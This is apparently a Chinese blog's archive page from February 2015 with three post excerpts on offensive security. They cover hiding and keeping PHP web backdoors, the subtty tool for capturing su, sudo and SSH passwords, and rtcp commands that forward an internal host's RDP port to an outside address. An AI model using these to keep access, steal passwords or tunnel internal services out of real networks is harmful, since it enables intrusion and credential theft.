Ψ小川Ψ dě Blog

归档:2015年02月

Web后门隐藏与维持

前言

在一个成功的测试后,通常会想让特权保持的更久些.留后门的工作就显得至关重要,通常布设的后门包括但不限于数据库权限,WEB权限,系统用户权限等等.此文则对大众后门隐藏的一些思路做科普.

以PHP-WEBBACKDOOR为例,抛砖引玉

Subtty记录Linux密码的利器

一直在寻找一款能够记录SSH密码的工具,subtty这款工具能够记录su,sudo,SSH,gpg, cryptmount等,非常强大,只要是一个交互的终端即可。
该工具作者是Julien Tinnes,感谢这位大神,这里也分享给大家。
在作者博客下载的只有编译好的二进制程序(回头找他要源码),这里简单说一下使用方法,这个程序不需要root权限,但是很快就有root了。
可以有四种方式调用程序来记录密码:

rtcp 端口反弹工具

# 本地监听9001,端口9002接受另外连接

python rtcp.py l:9001 l:9002

# 将目标内网10.10.10.1的3389端口转发到8.8.8.8:9001

python rtcp.py c:8.8.8.8:9001 c:10.10.10.1:3389